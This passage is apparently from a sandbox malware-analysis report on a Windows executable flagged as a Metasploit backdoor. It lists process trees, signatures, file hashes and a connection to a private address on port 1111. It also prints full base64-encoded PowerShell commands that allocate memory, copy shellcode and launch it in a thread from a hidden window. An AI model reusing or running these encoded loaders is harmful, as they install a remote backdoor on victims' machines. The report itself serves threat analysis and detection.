B4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABQAHkAeAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFAAeQB4ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADkALAAwAHgAYQBiACwAMAB4AGEAOAAsADAAeABhAGMALAAwAHgAZAA5ACwAMAB4AGUAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBhACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAZgAzACwAMAB4ADUANwAsADAAeAA0AGEALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA0ADAALAAwAHgAMAA0ACwAMAB4AGEAMgAsADAAeABmAGYALAAwAHgAOQAwACwAMAB4ADcAYgAsADAAeAA5ADIALAAwAHgAMgBkACwAMAB4AGYANAAsADAAeABmADAALAAwAHgAOAA2ACwAMAB4AGUAMQAsADAAeAA3AGMALAAwAHgAZQAzACwAMAB4AGEAYwAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4ADYANwAsADAAeABlADAALAAwAHgANAA3ACwAMAB4ADAAMAAsADAAeAAwADUALAAwAHgAMgBkACwAMAB4ADUANgAsADAAeABlADkALAAwAHgAZQA1ACwAMAB4ADkAYQAsADAAeABkADIALAAwAHgAMwAzACwAMAB4AGMAYgAsADAAeAAyADQALAAwAHgANABlACwAMAB4ADAANwAsADAAeAA0AGEALAAwAHgAZAA5ACwAMAB4ADgAYwAsADAAeAA1ADQALAAwAHgAYQBjACwAMAB4AGUAMAAsADAAeAA1AGYALAAwAHgAYQA5ACwAMAB4AGEAZAAsADAAeAAyADUALAAwAHgAMQA2ACwAMAB4AGMANwAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwBmACwAMAB4AGUAYwAsADAAeAA3ADQALAAwAHgAZgAwACwAMAB4AGQAMwAsADAAeAAwAGQALAAwAHgANQBhACwAMAB4ADcAZQAsADAAeAA2AGIALAAwAHgANwA2ACwAMAB4AGQAZgAsADAAeAA0ADEALAAwAHgAMQA4ACwAMAB4AGMAYQAsADAAeABkAGUALAAwAHgAOQAxACwAMAB4AGIAMQAsADAAeAA1ADkALAAwAHgAYQA4ACwAMAB4ADAAOQAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4ADAAOAAsADAAeAAyAGIALAAwAHgANgBlACwAMAB4ADMAMwAsADAAeAA4ADEALAAwAHgANQBmACwAMAB4AGEAYwAsADAAeAAwAGQALAAwAHgAZQBlACwAMAB4AGUAOQAsADAAeAA0ADcALAAwAHgANQA5ACwAMAB4ADkAYgAsADAAeABlAGIALAAwAHgAOAAxACwAMAB4ADkAMwAsADAAeAA1AGIALAAwAHgAMgBhACwAMAB4AGUAMgAsADAAeABkADkALAAwAHgAZgA3ACwAMAB4AGEAYwAsADAAeAAzAGEALAAwAHgAZAA5ACwAMAB4AGUANwAsADAAeABkAGEALAAwAHgAMwAwACwAMAB4ADEAOQAsADAAeAA5AGEALAAwAHgAZABjACwAMAB4ADgAMgAsADAAeAA2ADMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAxADUALAAwAHgAYwAzACwAMAB4ADAAMwAsADAAeABjAGEALAAwAHgAZgAxACwAMAB4AGYANQAsADAAeABjADAALAAwAHgAOABkACwAMAB4ADcAMgAsADAAeABmADkALAAwAHgAYQBkACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAMQBlACwAMAB4ADMAMAAsADAAeAAwAGUALAAwAHgANQA2ACwAMAB4ADEAYQAsADAAeABiADkALAAwAHgAYgAxACwAMAB4AGIAOQAsADAAeABhAGEALAAwAHgAZgA5ACwAMAB4ADkANQAsADAAeAAxAGQALAAwAHgAZgA2ACwAMAB4ADUAYQAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4ADUAMgAsADAAeAAwAGQALAAwAHgAYwA4ACwAMAB4ADUANwAsADAAeAAzAGEALAAwAHgAZgAyACwAMAB4ADYAYwAsADAAeAAxADMALAAwAHgAYQA5ACwAMAB4AGUANQAsADAAeAAxADEALAAwAHgAZABjACwAMAB4ADMAMQAsADAAeAAwAGEALAAwAHgANABjACwAMAB4ADQAYgAsADAAeABmAGQALAAwAHgAYwA2ACwAMAB4ADYAZgAsADAAeAA4AGIALAAwAHgANgA5ACwAMAB4ADUAMQAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADMANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4AGYAMQAsADAAeABiAGYALAAwAHgAZAA3ACwAMAB4ADQAYwAsADAAeAA4ADMALAAwAHgAYQA4ACwAMAB4AGUAOAAsADAAeAA4ADMALAAwAHgAMgBiACwAMAB4AGIAOAAsADAAeAAxADcALAAwAHgAMgA0ACwAMAB4ADQAYwAsADAAeAA5ADAALAAwAHgAZAAzACwAMAB4ADcAMAAsADAAeAAxAGMALAAwAHgAOABhACwAMAB4AGYAMgAsADAAeABmADgALAAwAHgAZgA3ACwAMAB4ADQAYQAsADAAeABmAGIALAAwAHgAMgBjACwAMAB4ADYAZAAsADAAeAA0ADEALAAwAHgANgBiACwAMAB4ADAAZgAsADAAeABkAGEALAAwAHgAZQAxACwAMAB4AGUAYQAsADAAeABlADcALAAwAHgAMQA5ACwAMAB4ADAAYQAsADAAeABlADgALAAwAHgAYQAwACwAMAB4ADkANAAsADAAeABlAGMALAAwAHgAYQAwACwAMAB4ADEAZQAsADAAeABmADcALAAwAHgAYQAwACwAMAB4ADAAMAAsADAAeABjAGYALAAwAHgAYgA3ACwAMAB4ADEAMAAsADAAeABlADgALAAwAHgAMAA1ACwAMAB4ADMAOAAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADIANgAsADAAeAA5ADIALAAwAHgAZQA3ACwAMAB4AGEAMgAsADAAeABjADkALAAwAHgANABiACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgANwAzACwAMAB4AGQANgAsADAAeAAyAGIALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgANQAxACwAMAB4ADMAYgAsADAAeABmADYALAAwAHgAZQAzACwAMAB4AGEANgAsADAAeABmADUALAAwAHgAZgBmACwAMAB4ADgAZQAsADAAeABiADQALAAwAHgANgAxACwAMAB4AGYAMAAsADAAeABjADQALAAwAHgAZQA3ACwAMAB4ADIANwAsADAAeAAwAGYALAAwAHgAZgAzACwAMAB4ADgAMgAsADAAeABjADcALAAwAHgAOAA1ACwAMAB4AGYAOAAsADAAeAAwADQALAAwAHgAOQAwACwAMAB4ADMAMQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4AGQANgAsADAAeAA5AGQALAAwAHgAZgBjACwAMAB4ADUANwAsADAAeAA2AGQALAAwAHgAMQA3ACwAMAB4ADYAOQAsADAAeAAxADgALAAwAHgAMQA5ACwAMAB4ADUAOAAsADAAeAA3AGQALAAwAHgAOQA4ACwAMAB4AGQAOQAsADAAeAAwAGUALAAwAHgAMQA3ACwAMAB4ADkAOAAsADAAeABiADEALAAwAHgAZgA2ACwAMAB4ADQAMwAsADAAeABjAGIALAAwAHgAYQA0ACwAMAB4AGYAOAAsADAAeAA1ADkALAAwAHgANwBmACwAMAB4ADcANQAsADAAeAA2AGQALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAAyAGEALAAwAHgAMgA2ACwAMAB4ADAAYQAsADAAeABkADQALAAwAHgAMQA1ACwAMAB4ADAAMAAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADcAMAAsADAAeAA5ADAALAAwAHgAZQA5ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAZQA2ACwAMAB4ADAAMwAsADAAeABjADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGQATwBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABkAE8ASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZABPAEgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i4es6ow6.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES142D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC142C.tmp"

Network

Country Destination Domain Proto
N/A 192.168.180.129:1111 tcp

Files

memory/2392-0-0x000000013F580000-0x000000013F5A3000-memory.dmp

memory/1956-5-0x000007FEF534E000-0x000007FEF534F000-memory.dmp

memory/1956-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/1956-7-0x0000000002390000-0x0000000002398000-memory.dmp

memory/1956-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9db305db7c86664669f95fc653bc1999
SHA1 34dfe6b0cbdab397796e1df46a36c3667575cffa
SHA256 caaca6a90d57aa54e0fcc5c3e33026cc468079b71fa69a8f37f44056e3e4d9a9
SHA512 02e09a9cb9b742f475e22204e2d64cda37967a843179c441d327ad15ae856d71fa77b67bd9fbacdda1f40899cda763f856e5e62c2c9efda50da6dbdc976d141f

memory/1956-14-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1956-15-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\i4es6ow6.cmdline

MD5 7f51f8377bdf2738e36092859da55930
SHA1 d47bb97f54303b5fda3987d1cec5bb93cefe2096
SHA256 cc2665b036c88aa7379c38a4df69512b777a9ec5fb46dc71496045439b16c833
SHA512 ecd7c39cd86d838574e89af08f3022e6e1f81501ec63222542530f6c6d52835f2d217c5f37aefe79e7f8c8065009f618e82e3f84fc41a3c8d1c6e0161f1bfbad

\??\c:\Users\Admin\AppData\Local\Temp\i4es6ow6.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

C:\Users\Admin\AppData\Local\Temp\RES142D.tmp

MD5 ccdf7db87fb98a829ce809ab1a8d7cff
SHA1 36352686766d36ac18f216245ae5d6c9d94fc4f7
SHA256 fe1189b9a2310710f8d72303b874def5113253233b3ee4c27a52f36f90295190
SHA512 ff678d923baa7238b8c9eca5db5d6b6b0b78b48ee9a09b9586793efaa8d1375649df3d42a18791afa9046e749e4bc75adbc011e479fe78730b57486e96ca3527

C:\Users\Admin\AppData\Local\Temp\i4es6ow6.pdb

MD5 3dd00aa00a39029e37b178445d6eb69f
SHA1 082960a5d887ea1547194c2ca53911601f3c8411
SHA256 498fe8706ba781296e86532f786f4e76262795531a789d64a57cd0938da353fa
SHA512 e15b4d6a93da74866ecf377a4bea1ef004f244fa22543633683e851138fcf8691beddecf9b9696d898d0ac39271607f9fc18613d167e9f355f001c11e0aa8e8f

C:\Users\Admin\AppData\Local\Temp\i4es6ow6.dll

MD5 1a4272232dd9d95ec83d0b54154eda6d
SHA1 67e11388b363d2b1148c1dee3887d702b135f558
SHA256 769f6e6160c95e7950b247dd0b902e9e1a3fdf0fb51d5ca47205a393bb110823
SHA512 bdf11f024104041196684d0ad51b0240c1a31c7d670ce2583651009c394c0e981633d2975589eb60e8fba371a7fd5d0df13bf2f141e181c5a6f363acb245cedd

\??\c:\Users\Admin\AppData\Local\Temp\CSC142C.tmp

MD5 368fcd34ae10040f74a472a90ecf7b06
SHA1 726edb32727095fe4713d2dcc9b4cc78dab40655
SHA256 4119f6db05ce0c706d0eeff14bade0bb6df61f010cca89a24302a9f287d3bde4
SHA512 5b35d125d85a10e648205595bba0324c0218a2ea2bc076a9ae4012af3fa97f86722d936d15e500c362ffbd900aa212539c46f70de6f22295b12c155ee97ba6de

memory/2584-33-0x0000000002C30000-0x0000000002C31000-memory.dmp

memory/1956-34-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 23:07

Reported

2024-05-27 23:10

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 2348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1896 wrote to memory of 2348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1896 wrote to memory of 2348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2348 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2348 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2348 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAw